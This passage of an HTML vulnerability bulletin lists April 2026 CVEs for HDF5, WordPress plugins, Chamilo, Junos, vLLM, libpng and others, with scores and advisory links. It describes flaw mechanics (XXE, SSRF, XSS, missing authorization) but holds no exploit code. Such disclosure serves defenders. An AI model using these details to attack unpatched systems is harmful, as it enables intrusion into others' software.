<a href=3D"https://github.com/volcengine/OpenViking/releases/tag/v0.3.3" ta= rget=3D"_blank" rel=3D"noopener">https://github.com/volcengine/OpenViking/r= eleases/tag/v0.3.3</a><br><a href=3D"https://github.com/volcengine/OpenViki= ng/pull/1182" target=3D"_blank" rel=3D"noopener">https://github.com/volceng= ine/OpenViking/pull/1182</a><br><a href=3D"https://github.com/volcengine/Op= enViking/commit/8c1c3f3608364ee0bb0e45f73478771a68aebdf5" target=3D"_blank"=
rel=3D"noopener">https://github.com/volcengine/OpenViking/commit/8c1c3f360= 8364ee0bb0e45f73478771a68aebdf5</a><br><a href=3D"https://www.vulncheck.com= /advisories/openviking-missing-authorization-via-task-polling" target=3D"_b= lank" rel=3D"noopener">https://www.vulncheck.com/advisories/openviking-miss= ing-authorization-via-task-polling</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">HDFGroup--hdf5</td>
<td>HDF5 is software for managing data. In 1.14.1-2 and earlier, an attacke=
r who can control an h5 file parsed by HDF5 can trigger a write-based heap = buffer overflow condition in the H5T__ref_mem_setnull method. This can lead=
to a denial-of-service condition, and potentially further issues such as r= emote code execution depending on the practical exploitability of the heap = overflow against modern operating systems.</td>
<td>2026-04-10</td>
<td>5.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-29043" target=3D= "_blank" rel=3D"noopener">CVE-2026-29043</a></td>

<a href=3D"https://github.com/HDFGroup/hdf5/security/advisories/GHSA-qm2m-5= g5w-2277" target=3D"_blank" rel=3D"noopener">https://github.com/HDFGroup/hd= f5/security/advisories/GHSA-qm2m-5g5w-2277</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">smub--Charitable Donation Plugin for WordPress=
Fundraising with Recurring Donations &amp; More</td>
<td>The Charitable - Donation Plugin for WordPress - Fundraising with Recur= ring Donations &amp; More plugin for WordPress is vulnerable to Insufficien=
t Verification of Data Authenticity in versions up to, and including, 1.8.9= .7. This is due to missing cryptographic verification of incoming Stripe we= bhook events. This makes it possible for unauthenticated attackers to forge=
payment_intent.succeeded webhook payloads and mark pending donations as co= mpleted without a real payment.</td>
<td>2026-04-07</td>
<td>5.3</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-3177" target=3D"= _blank" rel=3D"noopener">CVE-2026-3177</a></td>

<a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/bc3b26= 45-7b57-4884-99c5-e37dbd4a9600?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/bc3b2645-7b5= 7-4884-99c5-e37dbd4a9600?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/changeset/3485023/charitable" target=3D"_blank" rel=3D"noop= ener">https://plugins.trac.wordpress.org/changeset/3485023/charitable</a><b= r>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Red Hat--mirror registry for Red Hat OpenShift= </td>
<td>A flaw was found in Red Hat Quay's Proxy Cache configuration feature. W= hen an organization administrator configures an upstream registry for proxy=
caching, Quay makes a network connection to the specified registry hostnam=
e without verifying that it points to a legitimate external service. An att= acker with organization administrator privileges could supply a crafted hos= tname to force the Quay server to make requests to internal network service=
s, cloud infrastructure endpoints, or other resources that should not be ac= cessible from the Quay application.</td>
<td>2026-04-08</td>
<td>5.2</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-32591" target=3D= "_blank" rel=3D"noopener">CVE-2026-32591</a></td>

<a href=3D"https://access.redhat.com/security/cve/CVE-2026-32591" target=3D= "_blank" rel=3D"noopener">https://access.redhat.com/security/cve/CVE-2026-3= 2591</a><br><a href=3D"https://bugzilla.redhat.com/show_bug.cgi?id=3D244696=
5" target=3D"_blank" rel=3D"noopener">RHBZ#2446965</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">opensourcepos--opensourcepos</td>
<td>Open Source Point of Sale is a web based point-of-sale application writ= ten in PHP using CodeIgniter framework. Prior to 3.4.3, a Stored Cross-Site=
Scripting (XSS) vulnerability exists in the Daily Sales management table. = The customer_name column is configured with escape: false in the bootstrap-= table column configuration, causing customer names to be rendered as raw HT= ML. An attacker with customer management permissions can inject arbitrary J= avaScript into a customer's first_name or last_name field, which executes i=
n the browser of any user viewing the Daily Sales page. This vulnerability =
is fixed in 3.4.3.</td>
<td>2026-04-07</td>
<td>5.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-32712" target=3D= "_blank" rel=3D"noopener">CVE-2026-32712</a></td>

<a href=3D"https://github.com/opensourcepos/opensourcepos/security/advisori= es/GHSA-hcfr-9hfv-mcwp" target=3D"_blank" rel=3D"noopener">https://github.c= om/opensourcepos/opensourcepos/security/advisories/GHSA-hcfr-9hfv-mcwp</a><= br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">chamilo--chamilo-lms</td>
<td>Chamilo LMS is a learning management system. Prior to 2.0.0-RC.3, a Ref= lected Cross-Site Scripting (XSS) vulnerability in the exercise question li=
st admin panel allows an attacker to execute arbitrary JavaScript in an aut= henticated teacher's browser. The pagination code merges all $_GET paramete=
rs via array_merge() and outputs the result via http_build_query() directly=
into HTML href attributes without htmlspecialchars() encoding. This vulner= ability is fixed in 2.0.0-RC.3.</td>
<td>2026-04-10</td>
<td>5.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-32893" target=3D= "_blank" rel=3D"noopener">CVE-2026-32893</a></td>

<a href=3D"https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-= 37jh-g64j-88mc" target=3D"_blank" rel=3D"noopener">https://github.com/chami= lo/chamilo-lms/security/advisories/GHSA-37jh-g64j-88mc</a><br><a href=3D"ht= tps://github.com/chamilo/chamilo-lms/commit/72bc403f89b1ebb73a139f8f6cf0478= 857592276" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo/ch= amilo-lms/commit/72bc403f89b1ebb73a139f8f6cf0478857592276</a><br>=C2=A0</td=

</tr>

<td class=3D"vendor-product">Microsoft--Microsoft Edge for Android</td> <td>User interface (ui) misrepresentation of critical information in Micros= oft Edge (Chromium-based) allows an unauthorized attacker to perform spoofi=
ng over a network.</td>
<td>2026-04-10</td>
<td>5.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33119" target=3D= "_blank" rel=3D"noopener">CVE-2026-33119</a></td>

<a href=3D"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-3= 3119" target=3D"_blank" rel=3D"noopener">Microsoft Edge (Chromium-based) fo=
r Android Spoofing Vulnerability</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">pi-hole--web</td>
<td>Pi-hole Admin Interface is a web interface for managing Pi-hole, a netw= ork-level ad and internet tracker blocking application. From 6.0 to before = 6.5, configuration values from the /api/config endpoint are placed directly=
into HTML value=3D"" attributes without escaping in settings-advanced.js, = enabling HTML attribute injection. A double quote in any config value break=
s out of the attribute context. JavaScript execution is blocked by the serv= er's CSP (script-src 'self'), but injected attributes can alter element sty= ling for UI redressing. The primary attack vector is importing a malicious = teleporter backup, which bypasses per-field server-side validation. This vu= lnerability is fixed in 6.5.</td>
<td>2026-04-06</td>
<td>5.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33406" target=3D= "_blank" rel=3D"noopener">CVE-2026-33406</a></td>

<a href=3D"https://github.com/pi-hole/web/security/advisories/GHSA-9rfm-c5g= 6-538p" target=3D"_blank" rel=3D"noopener">https://github.com/pi-hole/web/s= ecurity/advisories/GHSA-9rfm-c5g6-538p</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">themeum--Tutor LMS eLearning and online course=
solution</td>
<td>The Tutor LMS - eLearning and online course solution plugin for WordPre=
ss is vulnerable to unauthorized private course enrollment in all versions =
up to, and including, 3.9.7. This is due to missing post_status validation =
in the `enroll_now()` and `course_enrollment()` functions. Both enrollment = endpoints verify the nonce, user authentication, and whether the course is = purchasable, but fail to check if the course has a `private` post_status. T= his makes it possible for authenticated attackers with Subscriber-level acc= ess or above to enroll in private courses by sending a crafted POST request=
with the target course ID. The enrollment record is created in the databas=
e and the private course title and enrollment status are exposed in the sub= scriber's dashboard, though WordPress core access control prevents the subs= criber from viewing the actual course content (returns 404). Enrollment in = private courses should be restricted to users with the `read_private_posts`=
capability.</td>
<td>2026-04-11</td>
<td>5.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-3358" target=3D"= _blank" rel=3D"noopener">CVE-2026-3358</a></td>

<a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/0c1733= 56-7228-4253-bb28-2c2e11af76fd?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/0c173356-722= 8-4253-bb28-2c2e11af76fd?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/browser/tutor/tags/3.9.7/classes/Course.php#L2066" target= =3D"_blank" rel=3D"noopener">https://plugins.trac.wordpress.org/browser/tut= or/tags/3.9.7/classes/Course.php#L2066</a><br><a href=3D"https://plugins.tr= ac.wordpress.org/browser/tutor/tags/3.9.7/classes/Course.php#L134" target= =3D"_blank" rel=3D"noopener">https://plugins.trac.wordpress.org/browser/tut= or/tags/3.9.7/classes/Course.php#L134</a><br><a href=3D"https://plugins.tra= c.wordpress.org/browser/tutor/trunk/classes/Course.php#L2053" target=3D"_bl= ank" rel=3D"noopener">https://plugins.trac.wordpress.org/browser/tutor/trun= k/classes/Course.php#L2053</a><br><a href=3D"https://plugins.trac.wordpress= .org/browser/tutor/trunk/classes/Course.php#L2989" target=3D"_blank" rel=3D= "noopener">https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/C= ourse.php#L2989</a><br><a href=3D"https://plugins.trac.wordpress.org/change= set?old_path=3D%2Ftutor/tags/3.9.7&new_path=3D%2Ftutor/tags/3.9.8" target= =3D"_blank" rel=3D"noopener">https://plugins.trac.wordpress.org/changeset?o= ld_path=3D%2Ftutor/tags/3.9.7&new_path=3D%2Ftutor/tags/3.9.8</a><br><a href= =3D"https://plugins.trac.wordpress.org/changeset/3496394/tutor/trunk/classe= s/Course.php" target=3D"_blank" rel=3D"noopener">https://plugins.trac.wordp= ress.org/changeset/3496394/tutor/trunk/classes/Course.php</a><br>=C2=A0</td=

</tr>

<td class=3D"vendor-product">chamilo--chamilo-lms</td>
<td>Chamilo LMS is a learning management system. Prior to 1.11.38, Twig tem= plate files (.tpl) under /main/template/default/ are directly accessible wi= thout authentication via HTTP GET requests. These templates expose internal=
application logic, variable names, AJAX endpoint URLs, and admin panel str= ucture. This vulnerability is fixed in 1.11.38.</td>
<td>2026-04-10</td>
<td>5.3</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33705" target=3D= "_blank" rel=3D"noopener">CVE-2026-33705</a></td>

<a href=3D"https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-= 5wjg-8x28-px57" target=3D"_blank" rel=3D"noopener">https://github.com/chami= lo/chamilo-lms/security/advisories/GHSA-5wjg-8x28-px57</a><br><a href=3D"ht= tps://github.com/chamilo/chamilo-lms/commit/4efb5ee8ed849ca147ca1fe7472ef7b= 98db17bff" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo/ch= amilo-lms/commit/4efb5ee8ed849ca147ca1fe7472ef7b98db17bff</a><br>=C2=A0</td=

</tr>

<td class=3D"vendor-product">chamilo--chamilo-lms</td>
<td>Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0= -RC.3, multiple files use simplexml_load_string() without XXE protection. W= ith LIBXML_NOENT flag, arbitrary server files can be read. This vulnerabili=
ty is fixed in 1.11.38 and 2.0.0-RC.3.</td>
<td>2026-04-10</td>
<td>5.3</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33737" target=3D= "_blank" rel=3D"noopener">CVE-2026-33737</a></td>

<a href=3D"https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-= c4ww-qgf2-v89j" target=3D"_blank" rel=3D"noopener">https://github.com/chami= lo/chamilo-lms/security/advisories/GHSA-c4ww-qgf2-v89j</a><br><a href=3D"ht= tps://github.com/chamilo/chamilo-lms/commit/22b1cb1c609b643765c88654155aba2= 7070c927e" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo/ch= amilo-lms/commit/22b1cb1c609b643765c88654155aba27070c927e</a><br><a href=3D= "https://github.com/chamilo/chamilo-lms/commit/af6b7002af7c15825e98fc522e2e= ad0d00cacaa3" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo= /chamilo-lms/commit/af6b7002af7c15825e98fc522e2ead0d00cacaa3</a><br>=C2=A0<=

</tr>

<td class=3D"vendor-product">Juniper Networks--Junos OS</td>
<td>An Incorrect Initialization of Resource vulnerability in the packet for= warding engine (pfe) of Juniper Networks Junos OS on specific EX Series and=
QFX Series device allows an unauthenticated, network-based attacker to cau=
se an integrity impact to downstream networks. When the same family inet or=
inet6 filter is applied on an IRB interface and on a physical interface as=
egress filter on EX4100, EX4400, EX4650 and QFX5120 devices, only one of t=
he two filters will be applied, which can lead to traffic being sent out on=
e of these interfaces which should have been blocked. This issue affects Ju= nos OS on EX Series and QFX Series: * 23.4 version 23.4R2-S6, * 24.2 versio=
n 24.2R2-S3. No other Junos OS versions are affected.</td>
<td>2026-04-09</td>
<td>5.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33773" target=3D= "_blank" rel=3D"noopener">CVE-2026-33773</a></td>

<a href=3D"https://kb.juniper.net/JSA107815" target=3D"_blank" rel=3D"noope= ner">https://kb.juniper.net/JSA107815</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Juniper Networks--Junos OS</td>
<td>A Missing Authorization vulnerability in the CLI of Juniper Networks Ju= nos OS and Junos OS Evolved allows a local user with low privileges to read=
sensitive information. A local user with low privileges can execute the CL=
I command 'show mgd' with specific arguments which will expose sensitive in= formation. This issue affects Junos OS: * all versions before 22.4R3-S8, * = 23.2 versions before 23.2R2-S6, * 23.4 versions before 23.4R2-S6, * 24.2 ve= rsions before 24.2R2-S4, * 24.4 versions before 24.4R2-S1, * 25.2 version b= efore 25.2R1-S2, 25.2R2; Junos OS Evolved: * all versions before 23.2R2-S6-= EVO, * 23.4 version before 23.4R2-S6-EVO, * 24.2 version before 24.2R2-S4-E= VO, * 24.4 versions before 24.4R2-S1-EVO, * 25.2 versions before 25.2R2-EVO= .</td>
<td>2026-04-09</td>
<td>5.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33776" target=3D= "_blank" rel=3D"noopener">CVE-2026-33776</a></td>

<a href=3D"https://kb.juniper.net/JSA107866" target=3D"_blank" rel=3D"noope= ner">https://kb.juniper.net/JSA107866</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Juniper Networks--Junos OS</td>
<td>An Improper Check for Unusual or Exceptional Conditions vulnerability i=
n the chassis control daemon (chassisd) of Juniper Networks Junos OS on SRX= 1600, SRX2300 and SRX4300 allows a local attacker with low privileges to ca= use a complete Denial of Service (DoS). When a specific 'show chassis' CLI = command is executed, chassisd crashes and restarts which causes a momentary=
impact to all traffic until all modules are online again. This issue affec=
ts Junos OS on SRX1600, SRX2300 and SRX4300: * 24.4 versions before 24.4R1-= S3, 24.4R2. This issue does not affect Junos OS versions before 24.4R1.</td=

<td>2026-04-09</td>
<td>5.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33786" target=3D= "_blank" rel=3D"noopener">CVE-2026-33786</a></td>

<a href=3D"https://kb.juniper.net/JSA107810" target=3D"_blank" rel=3D"noope= ner">https://kb.juniper.net/JSA107810</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Juniper Networks--Junos OS</td>
<td>An Improper Check for Unusual or Exceptional Conditions vulnerability i=
n the chassis control daemon (chassisd) of Juniper Networks Junos OS on SRX= 1500, SRX4100, SRX4200 and SRX4600 allows a local attacker with low privile= ges to cause a complete Denial of Service (DoS). When a specific 'show chas= sis' CLI command is executed, chassisd crashes and restarts which causes a = momentary impact to all traffic until all modules are online again. This is= sue affects Junos OS on SRX1500, SRX4100, SRX4200 and SRX4600:=C2=A0 * 23.2=
versions before=C2=A023.2R2-S6, * 23.4 versions before=C2=A023.4R2-S7 * 24=
.2 versions before 24.2R2-S2, * 24.4 versions before 24.4R2, * 25.2 version=
s before 25.2R1-S1, 25.2R2.</td>
<td>2026-04-09</td>
<td>5.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33787" target=3D= "_blank" rel=3D"noopener">CVE-2026-33787</a></td>

<a href=3D"https://kb.juniper.net/JSA107873" target=3D"_blank" rel=3D"noope= ner">https://kb.juniper.net/JSA107873</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">AcademySoftwareFoundation--openexr</td> <td>OpenEXR provides the specification and reference implementation of the = EXR file format, an image storage format for the motion picture industry. F= rom 3.2.0 to before 3.2.7, 3.3.9, and 3.4.9, a signed integer overflow exis=
ts in undo_pxr24_impl() in src/lib/OpenEXRCore/internal_pxr24.c at line 377=
. The expression (uint64_t)(w * 3) computes w * 3 as a signed 32-bit intege=
r before casting to uint64_t. When w is large, this multiplication constitu= tes undefined behavior under the C standard. On tested builds (clang/gcc wi= thout sanitizers), two's-complement wraparound commonly occurs, and for spe= cific values of w the wrapped result is a small positive integer, which may=
allow the subsequent bounds check to pass incorrectly. If the check is byp= assed, the decoding loop proceeds to write pixel data through dout, potenti= ally extending far beyond the allocated output buffer. This vulnerability i=
s fixed in 3.2.7, 3.3.9, and 3.4.9.</td>
<td>2026-04-06</td>
<td>5.9</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34380" target=3D= "_blank" rel=3D"noopener">CVE-2026-34380</a></td>

<a href=3D"https://github.com/AcademySoftwareFoundation/openexr/security/ad= visories/GHSA-q3v8-hw4m-59w5" target=3D"_blank" rel=3D"noopener">https://gi= thub.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-q3v8-hw= 4m-59w5</a><br><a href=3D"https://github.com/AcademySoftwareFoundation/open= exr/releases/tag/v3.2.7" target=3D"_blank" rel=3D"noopener">https://github.= com/AcademySoftwareFoundation/openexr/releases/tag/v3.2.7</a><br><a href=3D= "https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.3.9" = target=3D"_blank" rel=3D"noopener">https://github.com/AcademySoftwareFounda= tion/openexr/releases/tag/v3.3.9</a><br><a href=3D"https://github.com/Acade= mySoftwareFoundation/openexr/releases/tag/v3.4.9" target=3D"_blank" rel=3D"= noopener">https://github.com/AcademySoftwareFoundation/openexr/releases/tag= /v3.4.9</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">vllm-project--vllm</td>
<td>vLLM is an inference and serving engine for large language models (LLMs=
). From 0.16.0 to before 0.19.0, a server-side request forgery (SSRF) vulne= rability in download_bytes_from_url allows any actor who can control batch = input JSON to make the vLLM batch runner issue arbitrary HTTP/HTTPS request=
s from the server, without any URL validation or domain restrictions. This = can be used to target internal services (e.g. cloud metadata endpoints or i= nternal HTTP APIs) reachable from the vLLM host. This vulnerability is fixe=
d in 0.19.0.</td>
<td>2026-04-06</td>
<td>5.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34753" target=3D= "_blank" rel=3D"noopener">CVE-2026-34753</a></td>

<a href=3D"https://github.com/vllm-project/vllm/security/advisories/GHSA-pf= 3h-qjgv-vcpr" target=3D"_blank" rel=3D"noopener">https://github.com/vllm-pr= oject/vllm/security/advisories/GHSA-pf3h-qjgv-vcpr</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">pnggroup--libpng</td>
<td>LIBPNG is a reference library for use in applications that read, create=
, and manipulate PNG (Portable Network Graphics) raster image files. From 1= .0.9 to before 1.6.57, passing a pointer obtained from png_get_PLTE, png_ge= t_tRNS, or png_get_hIST back into the corresponding setter on the same png_= struct/png_info pair causes the setter to read from freed memory and copy i=
ts contents into the replacement buffer. The setter frees the internal buff=
er before copying from the caller-supplied pointer, which now dangles. The = freed region may contain stale data (producing silently corrupted chunk met= adata) or data from subsequent heap allocations (leaking unrelated heap con= tents into the chunk struct). This vulnerability is fixed in 1.6.57.</td> <td>2026-04-09</td>
<td>5.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34757" target=3D= "_blank" rel=3D"noopener">CVE-2026-34757</a></td>

<a href=3D"https://github.com/pnggroup/libpng/security/advisories/GHSA-6fr7= -g8h7-v645" target=3D"_blank" rel=3D"noopener">https://github.com/pnggroup/= libpng/security/advisories/GHSA-6fr7-g8h7-v645</a><br><a href=3D"https://gi= thub.com/pnggroup/libpng/issues/836" target=3D"_blank" rel=3D"noopener">htt= ps://github.com/pnggroup/libpng/issues/836</a><br><a href=3D"https://github= .com/pnggroup/libpng/issues/837" target=3D"_blank" rel=3D"noopener">https:/= /github.com/pnggroup/libpng/issues/837</a><br><a href=3D"https://github.com= /pnggroup/libpng/commit/398cbe3df03f4e11bb031e07f416dfdde3684e8a" target=3D= "_blank" rel=3D"noopener">https://github.com/pnggroup/libpng/commit/398cbe3= df03f4e11bb031e07f416dfdde3684e8a</a><br><a href=3D"https://github.com/pngg= roup/libpng/commit/55d20aaa322c9274491cda82c5cd4f99b48c6bcc" target=3D"_bla= nk" rel=3D"noopener">https://github.com/pnggroup/libpng/commit/55d20aaa322c= 9274491cda82c5cd4f99b48c6bcc</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">projectzealous01--PZ Frontend Manager</td>
<td>The PZ Frontend Manager plugin for WordPress is vulnerable to Missing A= uthorization in all versions up to and including 1.0.6. The pzfm_user_reque= st_action_callback() function, registered via the wp_ajax_pzfm_user_request= _action action hook, lacks both capability checks and nonce verification. T= his function handles user activation, deactivation, and deletion operations=
. When the 'dataType' parameter is set to 'delete', the function calls wp_d= elete_user() on all provided user IDs without verifying that the current us=
er has the appropriate permissions. Notably, the similar pzfm_remove_item_c= allback() function does check pzfm_can_delete_user() before performing dele= tions, indicating this was an oversight. This makes it possible for authent= icated attackers, with Subscriber-level access and above, to delete arbitra=
ry WordPress users (including administrators) by sending a crafted request =
to the AJAX endpoint.</td>
<td>2026-04-08</td>
<td>5.3</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-3477" target=3D"= _blank" rel=3D"noopener">CVE-2026-3477</a></td>

<a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/90d8e3= 45-b549-493b-a84b-abe56ab42a04?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/90d8e345-b54= 9-493b-a84b-abe56ab42a04?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/browser/pz-frontend-manager/trunk/admin/includes/ajax-hooks= .php#L331" target=3D"_blank" rel=3D"noopener">https://plugins.trac.wordpres= s.org/browser/pz-frontend-manager/trunk/admin/includes/ajax-hooks.php#L331<= /a><br><a href=3D"https://plugins.trac.wordpress.org/browser/pz-frontend-ma= nager/tags/1.0.6/admin/includes/ajax-hooks.php#L331" target=3D"_blank" rel= =3D"noopener">https://plugins.trac.wordpress.org/browser/pz-frontend-manage= r/tags/1.0.6/admin/includes/ajax-hooks.php#L331</a><br><a href=3D"https://p= lugins.trac.wordpress.org/browser/pz-frontend-manager/trunk/admin/includes/= ajax-hooks.php#L292" target=3D"_blank" rel=3D"noopener">https://plugins.tra= c.wordpress.org/browser/pz-frontend-manager/trunk/admin/includes/ajax-hooks= .php#L292</a><br><a href=3D"https://plugins.trac.wordpress.org/browser/pz-f= rontend-manager/tags/1.0.6/admin/includes/ajax-hooks.php#L292" target=3D"_b= lank" rel=3D"noopener">https://plugins.trac.wordpress.org/browser/pz-fronte= nd-manager/tags/1.0.6/admin/includes/ajax-hooks.php#L292</a><br><a href=3D"= https://plugins.trac.wordpress.org/browser/pz-frontend-manager/trunk/admin/= includes/ajax-hooks.php#L290" target=3D"_blank" rel=3D"noopener">https://pl= ugins.trac.wordpress.org/browser/pz-frontend-manager/trunk/admin/includes/a= jax-hooks.php#L290</a><br><a href=3D"https://plugins.trac.wordpress.org/bro= wser/pz-frontend-manager/tags/1.0.6/admin/includes/ajax-hooks.php#L290" tar= get=3D"_blank" rel=3D"noopener">https://plugins.trac.wordpress.org/browser/= pz-frontend-manager/tags/1.0.6/admin/includes/ajax-hooks.php#L290</a><br>= =C2=A0</td>
</tr>

<td class=3D"vendor-product">Eniture technology--LTL Freight Quotes Worldwi=
de Express Edition</td>
<td>Missing Authorization vulnerability in Eniture technology LTL Freight Q= uotes - Worldwide Express Edition allows Exploiting Incorrectly Configured = Access Control Security Levels.This issue affects LTL Freight Quotes - Worl= dwide Express Edition: from n/a through 5.2.1.</td>
<td>2026-04-07</td>
<td>5.3</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34899" target=3D= "_blank" rel=3D"noopener">CVE-2026-34899</a></td>

<a href=3D"https://patchstack.com/database/wordpress/plugin/ltl-freight-quo= tes-worldwide-express-edition/vulnerability/wordpress-ltl-freight-quotes-wo= rldwide-express-edition-plugin-5-2-1-broken-access-control-vulnerability?_s= _id=3Dcve" target=3D"_blank" rel=3D"noopener">https://patchstack.com/databa= se/wordpress/plugin/ltl-freight-quotes-worldwide-express-edition/vulnerabil= ity/wordpress-ltl-freight-quotes-worldwide-express-edition-plugin-5-2-1-bro= ken-access-control-vulnerability?_s_id=3Dcve</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">OceanWP--Ocean Extra</td>
<td>Missing Authorization vulnerability in OceanWP Ocean Extra allows Explo= iting Incorrectly Configured Access Control Security Levels.This issue affe= cts Ocean Extra: from n/a through 2.5.3.</td>
<td>2026-04-07</td>
<td>5.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34903" target=3D= "_blank" rel=3D"noopener">CVE-2026-34903</a></td>

<a href=3D"https://patchstack.com/database/wordpress/plugin/ocean-extra/vul= nerability/wordpress-ocean-extra-plugin-2-5-3-broken-access-control-vulnera= bility?_s_id=3Dcve" target=3D"_blank" rel=3D"noopener">https://patchstack.c= om/database/wordpress/plugin/ocean-extra/vulnerability/wordpress-ocean-extr= a-plugin-2-5-3-broken-access-control-vulnerability?_s_id=3Dcve</a><br>=C2= =A0</td>
</tr>

<td class=3D"vendor-product">Heatmiser--Heatmiser Wifi Thermostat</td> <td>Heatmiser Wifi Thermostat 1.7 contains a cross-site request forgery vul= nerability that allows attackers to change administrator credentials by tri= cking authenticated users into submitting malicious requests. Attackers can=
craft HTML forms targeting the networkSetup.htm endpoint with parameters u= snm, usps, and cfps to modify the admin username and password without user = consent.</td>
<td>2026-04-12</td>
<td>4.3</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2019-25708" target=3D= "_blank" rel=3D"noopener">CVE-2019-25708</a></td>

<a href=3D"https://www.exploit-db.com/exploits/46100" target=3D"_blank" rel= =3D"noopener">ExploitDB-46100</a><br><a href=3D"https://www.vulncheck.com/a= dvisories/heatmiser-wifi-thermostat-cross-site-request-forgery" target=3D"_= blank" rel=3D"noopener">VulnCheck Advisory: Heatmiser Wifi Thermostat 1.7 C= ross-Site Request Forgery</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">GitLab--GitLab</td>
<td>GitLab has remediated an issue in GitLab EE affecting all versions from=
16.6 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that unde=
r certain circumstances could have allowed an authenticated user to have ac= cess to other users' email addresses via certain GraphQL queries.</td> <td>2026-04-08</td>
<td>4.3</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-9484" target=3D"= _blank" rel=3D"noopener">CVE-2025-9484</a></td>

<a href=3D"https://gitlab.com/gitlab-org/gitlab/-/issues/565363" target=3D"= _blank" rel=3D"noopener">GitLab Issue #565363</a><br><a href=3D"https://hac= kerone.com/reports/3303810" target=3D"_blank" rel=3D"noopener">HackerOne Bu=
g Bounty Report #3303810</a><br><a href=3D"https://about.gitlab.com/release= s/2026/04/08/patch-release-gitlab-18-10-3-released/" target=3D"_blank" rel= =3D"noopener">https://about.gitlab.com/releases/2026/04/08/patch-release-gi= tlab-18-10-3-released/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">vsourz1td--Advanced Contact form 7 DB</td>
<td>The Advanced Contact form 7 DB plugin for WordPress is vulnerable to un= authorized access of data due to a missing capability check on the 'vsz_cf7= _export_to_excel' function in all versions up to, and including, 2.0.9. Thi=
s makes it possible for authenticated attackers, with Subscriber-level acce=
ss and above, to export form submissions to excel file.</td> <td>2026-04-08</td>
<td>4.3</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-0814" target=3D"= _blank" rel=3D"noopener">CVE-2026-0814</a></td>

